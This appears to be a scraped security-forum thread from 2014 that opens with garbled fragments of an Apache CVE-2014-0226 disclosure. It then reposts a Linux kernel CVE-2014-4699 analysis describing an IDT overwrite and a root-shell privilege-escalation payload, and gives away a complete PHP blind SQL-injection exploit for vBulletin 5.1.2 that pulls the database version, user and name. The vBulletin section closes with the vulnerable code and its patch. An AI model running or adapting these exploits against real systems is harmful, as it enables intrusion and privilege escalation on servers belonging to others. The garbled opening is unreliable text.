notables 127.0.0.1 {A} [] 127.0.0.1 {A.01 cu0 cs0 127.0.0.1 {A27.0.0.1} [] 127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0 127.0.0.1 {A Û [] 127.0.0.1 {A HTTP/1.1} [] 127.0.0.1 {Ab><br /> 127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br /> 127.0.0.1 {A0.1.1:19666]</b><br /> 127.0.0.1 {A§} [] 127.0.0.1 {A cs0 127.0.0.1 {Adentity 127.0.0.1 {A HTTP/1.1} [] 127.0.0.1 {Ape: text/html; charset=ISO-8859-1 127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} [] 127.0.0.1 {Aÿÿÿÿÿÿÿ} [] 127.0.0.1 {Aanilla/htdocs/foo} [] 127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} [] 127.0.0.1 {A......................................... } [] 127.0.0.1 {A-2014 16:23:30 CEST} [] 127.0.0.1 {Acontent of htaccess 127.0.0.1 {Aver: Apache/2.4.7 (Unix) 127.0.0.1 {Aroxy:balancer://mycluster} [] We hope you enjoyed it. Regards, Marek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466 P.S. Re http://1337day.com/exploits/22451 , srsly? Either fake and someone tries to impersonate http://people.apache.org/~jorton/ or shame on you mate. Attachment: cve-2014-0226.txt Sursa: Full Disclosure: Apache HTTPd - description of the CVE-2014-0226.
-
CVE-2014-4699: Linux Kernel ptrace/sysret vulnerability analysis by Vitaly Nikolenko Posted on July 21, 2014 at 6:52 PM Introduction I believe this bug was first discovered around 2005 and affected a number of operating systems (not just Linux) on Intel 64-bit CPUs. The bug is basically how the SYSRET instruction is used by 64-bit kernels in the system call exit path. Unlike its slower alternative IRET, SYSRET does not restore all regular registers, segment registers or reflags. This is why it's faster than IRET. I've released the PoC code (on Twitter last week) that triggers the #GP in SYSRET and overwrites the #PF handler transferring the execution flow to the NOP sled mapped at a specific memory address in user-space. The following is my attempt to explain how this vulnerability is triggered. First, let's take a step back to see what the SYSRET instruction actually does. According to AMD, the SYSRET does the following: Load the instruction pointer (%rip) from %rcx Change code segment selector to guest mode (this effectively changes the privilege level) and this is exactly what it does on both Intel and AMD platforms. However, the difference between these two platforms comes to play when a general protection fault (#GP) is triggered. This fault is triggered if a non-canonical memory address ends up in %rcx upon executing the SYSRET instruction (since SYSRET loads %rip from %rcx). What is a non-canonical address? There are a few good explanations on the web (e.g., this link). On AMD architectures, the %rip is not assigned until after the privilege level has been changed back to guest mode (and #GP in user-space is not very interesting). However, on Intel architectures, thethe #GP fault is thrown in privileged mode (ring0). This also means that the current %rsp value is used in handling the #GP! Since SYSRET does not restore the %rsp, the kernel has to perform this operation prior to executing SYSRET. By the time the #GP happens, the kernel would have already restored the %rsp value from the user-space %rsp. In summary, this means that if we can trigger #GP in SYSRET: #GP will execute in privileged mode #GP will use the stack pointer supplied by us from user-space That's great but how do we trigger the #GP fault in the first place? The %rip address loaded from %rcx would always be canonical. That's where ptrace comes into play. If you are not familiar with ptrace, this is a good place to start. In short, that's how debuggers stop a running process and let you change register values on-the-fly. Using ptrace we can change %rip and %rsp to arbitrary values. Most ptrace paths go via the interface that catches the process using the signal handler which always returns with IRET. However, there are a few paths that can get caught with ptrace_event() instaed of the signal path. Refer to the PoC code for an example of using fork() with ptrace to force such a path. Exploitation For the exploitation phase, I was using Ubuntu 12.04.0 LTS (3.2.0-23-generic) simply because that's what I had at the moment as my VM. I think it was mentioned that this issue would affect 2.6.x as well as 3.x branches. To trigger the #GP fault in SYSRET we obviously need to set our %rip to a non-canonical address. In the PoC I'm using0x8fffffffffffffff but any non-canonical address would work. The next step is to set the %rsp value. If we'll set it a user-space address, we'll simply double fault. However, if we'll set it writable address in kernel-space, we can overwrite data on the stack. Let's take a look at the general_protection handler that we enter with an arbitrary %rsp pointer: 0xffffffff8165cba0 <general_protection> data32 xchg %ax,%ax 0xffffffff8165cba3 <general_protection+3> data32 xchg %ax,%ax 0xffffffff8165cba6 <general_protection+6> sub $0x78,%rsp 0xffffffff8165cbaa <general_protection+10> callq 0xffffffff8165cd90 <error_entry> [1] 0xffffffff8165cbaf <general_protection+15> mov %rsp,%rdi 0xffffffff8165cbb2 <general_protection+18> mov 0x78(%rsp),%rsi 0xffffffff8165cbb7 <general_protection+23> movq $0xffffffffffffffff,0x78(%rsp) 0xffffffff8165cbc0 <general_protection+32> callq 0xffffffff8165d040 <do_general_prote [2] 0xffffffff8165cbc5 <general_protection+37> jmpq 0xffffffff8165ce30 <error_exit> 0xffffffff8165cbca nopw 0x0(%rax,%rax,1) ... When entering the error_entry at [1], we overwrite a few entries on the stack ((0x78)%rsp to 0x8(%rsp)): 0xffffffff8165cd90 <error_entry> cld 0xffffffff8165cd91 <error_entry+1> mov %rdi,0x78(%rsp) 0xffffffff8165cd96 <error_entry+6> mov %rsi,0x70(%rsp) 0xffffffff8165cd9b <error_entry+11> mov %rdx,0x68(%rsp) 0xffffffff8165cda0 <error_entry+16> mov %rcx,0x60(%rsp) 0xffffffff8165cda5 <error_entry+21> mov %rax,0x58(%rsp) 0xffffffff8165cdaa <error_entry+26> mov %r8,0x50(%rsp) 0xffffffff8165cdaf <error_entry+31> mov %r9,0x48(%rsp) 0xffffffff8165cdb4 <error_entry+36> mov %r10,0x40(%rsp) 0xffffffff8165cdb9 <error_entry+41> mov %r11,0x38(%rsp) 0xffffffff8165cdbe <error_entry+46> mov %rbx,0x30(%rsp) 0xffffffff8165cdc3 <error_entry+51> mov %rbp,0x28(%rsp) 0xffffffff8165cdc8 <error_entry+56> mov %r12,0x20(%rsp) 0xffffffff8165cdcd <error_entry+61> mov %r13,0x18(%rsp) 0xffffffff8165cdd2 <error_entry+66> mov %r14,0x10(%rsp) 0xffffffff8165cdd7 <error_entry+71> mov %r15,0x8(%rsp) ... However, we can control all these registers (well, except for %rcx) via PTRACE_SETREGS (see the PoC for details): // get current registers ptrace(PTRACE_GETREGS, chld, NULL, ®s); // modify regs ... // set regs ptrace(PTRACE_SETREGS, chld, NULL, ®s); The general_protection handler then invokes the do_general_protection function at [2]: Dump of assembler code for function do_general_protection: 0xffffffff8165d040 <+0>: push %rbp 0xffffffff8165d041 <+1>: mov <code>%rsp</code>,%rbp 0xffffffff8165d044 <+4>: sub $0x20,<code>%rsp</code> 0xffffffff8165d048 <+8>: mov %rbx,-0x18(%rbp) 0xffffffff8165d04c <+12>: mov %r12,-0x10(%rbp) 0xffffffff8165d050 <+16>: mov %r13,-0x8(%rbp) 0xffffffff8165d054 <+20>: callq 0xffffffff816647c0 <mcount> 0xffffffff8165d059 <+25>: testb $0x2,0x91(%rdi) 0xffffffff8165d060 <+32>: mov %rdi,%r12 0xffffffff8165d063 <+35>: mov %rsi,%r13 0xffffffff8165d066 <+38>: je 0xffffffff8165d06f <do_general_protection+47> 0xffffffff8165d068 <+40>: callq *0xffffffff81c177d8 0xffffffff8165d06f <+47>: mov %gs:0xc500,%rbx [3] 0xffffffff8165d078 <+56>: testb $0x3,0x88(%r12) 0xffffffff8165d081 <+65>: je 0xffffffff8165d140 <do_general_protection+256> ... At [3], the kernel will page fault when accessing %gs:0xc500, then double fault and crash. The question now is what can we do to prevent the kernel from crashing and possibly transfer execution flow to our mapped memory region in user-space? Well, let's just overwrite the #PF (Page Fault) handler in the IDT (Interrupt Descriptor Table) with a memory address that we control. In the PoC code, I've mapped the following memory region in user-space: trampoline = mmap(0x80000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0); We then set our %rsp value to regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78, i.e., the IDT start address + address of the #PF handler (14th entry where each entry is 16 bytes) + 8 bytes (we need to overwrite offset 32..63 in the #PF entry with 0) + some padding. The Intel developer's manual (Vol 3A) provides a good explanation of the IDT structure. In the PoC code, the %rdi value (which is set to 0, regs.rdi = 0x0000000000000000) will overwrite the offset 32..63 in the #PF entry leaving us with a memory address that points to user-space. On my test VM, this address is 0x8165cbd0 which is why we've mapped our user-space memory region at 0x800000000-0x900000000. I should point out that it's important to MAP_POPULATE when mapping this memory region so we don't trigger #PF on accessing our mapped user-space address, i.e., #PF with trigger a double fault in this case. Here's the excerpt from the mmap(2) man page: MAP_POPULATE (since Linux 2.5.46) Populate (prefault) page tables for a mapping. For a file mapping, this causes read-ahead on the file. Later accesses to the mapping will not be blocked by page faults. MAP_POPULATE is supported for private mappings only since Linux 2.6.23. Once the #PF will is triggered, we'll land to our NOP sled. However, by that time, the IDT will trashed. We've overwritten a few entries in the IDT including a number of critical handlers. In the PoC, there is an attempt to restore the IDT by setting the register values (%rdi, %rsi, rdx, etc) to the original values: regs.rdi = 0x0000000000000000; regs.rsi = 0x81658e000010cbd0; regs.rdx = 0x00000000ffffffff; regs.rcx = 0x81658e000010cba0; regs.rax = 0x00000000ffffffff; regs.r8 = 0x81658e010010cb00; regs.r9 = 0x00000000ffffffff; regs.r10 = 0x81668e0000106b10; regs.r11 = 0x00000000ffffffff; regs.rbx = 0x81668e0000106ac0; regs.rbp = 0x00000000ffffffff; regs.r12 = 0x81668e0000106ac0; regs.r13 = 0x00000000ffffffff; regs.r14 = 0x81668e0200106a90; regs.r15 = 0x00000000ffffffff; This code is obviously very kernel-specific. In the payload, we can then do the usual privilege escalation routine (commit_creds(prepare_kernel_cred(NULL))), followed by some syscall execution (e.g., setuid(0); cp /bin/sh .; chown root:root ./sh; chmod u+s ./sh). Or we could attempt to set the appropriate registers and IRET to user-space with a stack pointer of our choice. Conclusion There are a few things to note here. The PoC is very kernel-specific. Trashing the IDT is not a good approach (i.e., it affects the kernel stability). Since 3.10.x the IDT is read-only, so this approach would no longer work. What other kernel structs can we overwrite that would give us a more reliable (and possible universal) way of exploitation? I would really appreciate any ideas here. Vitaly Nikolenko Twitter LinkedIn Email Copyright © Hashcrack 2014Sursa: Hashcrack - Vitaly Nikolenko
-
Nota: danyweb a reusit sa il descopere inaintea tiganilor de la 1337gay. Si nu l-a facut public, nu a incercat sa il vanda... Edit: Am adaugat detalii.
-
Nop, sa se faca de ras. Dupa cum se vede, e BANAL exploit-ul. Si nu e util, sunt prea putine forumuri cu vBulletin 5. O sa aduc mai multe detalii cand ajung la Bucuresti.
-
Some idiots are trying to sell it: http://1337day.com/exploits/22452 For 2000 $. Gay Here it is. Free. [phpcode]<?php /* Author: Nytro Powered by: Romanian Security Team Price: Free. Educational. */ error_reporting(E_ALL); ini_set('display_errors', 1); // Get arguments $target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5'; $expression = str_replace('/', '\\/', $target_url); // Function to send a POST request function httpPost($url,$params) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Accept: application/json, text/javascript, */*; q=0.01', 'X-Requested-With: XMLHttpRequest', 'Referer: https://rstforums.com/v5/memberlist', 'Accept-Language: en-US,en;q=0.5', 'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;' )); $output = curl_exec($ch); if($output == FALSE) print htmlspecialchars(curl_error($ch)); curl_close($ch); return $output; } // Function to get string between two other strings function get_string_between($string, $start, $end) { $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } // Get version print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n"; print "Version: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } // Get user print "\r\nUser: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } // Get database print "\r\nDatabse: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } print "\r\n" ?>[/phpcode] More details: The query was the following: SELECT user.userid, user.username, user.usergroupid AS usergroupid, user.lastactivity, user.options, user.posts, user.joindate, user.usertitle,user.reputation, session.lastactivity AS lastvisit, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, infractiongroupid, user.usergroupid FROM user AS user LEFT JOIN session AS session ON session.userid = user.userid WHERE user.username LIKE "[B][COLOR=#ff0000]D[/COLOR][/B]%" GROUP BY user.userid ORDER BY user.username ASC LIMIT 0, 10; The "D" is the controlled parameter. And, the quote (") was NOT escaped. The query was generated with a function from querydefs.php: public function fetchMemberList($params, $db, $check_only = false)The vulnerable code: if (!empty($params['startswith'])) { if ($params['startswith'] == '#') { $where[] = 'user.username REGEXP "^[^a-z].?"'; } else { $where[] = 'user.username LIKE "' . $params['startswith'] . '%"'; } } And the patch contains the fix: if (!empty($params['startswith'])) { if ($params['startswith'] == '#') { $where[] = 'user.username REGEXP "^[^a-z].?"'; } else { $where[] = 'user.username LIKE "' . $db->escape_string_like($params['startswith']) . '%"'; } } So now, the value is escaped and SQL Injection is fixed. vBulletin team moved really fast in fixing this problem. More info: https://rstforums.com/forum/86951-rst-vbulletin-5-1-2-sql-injection.rst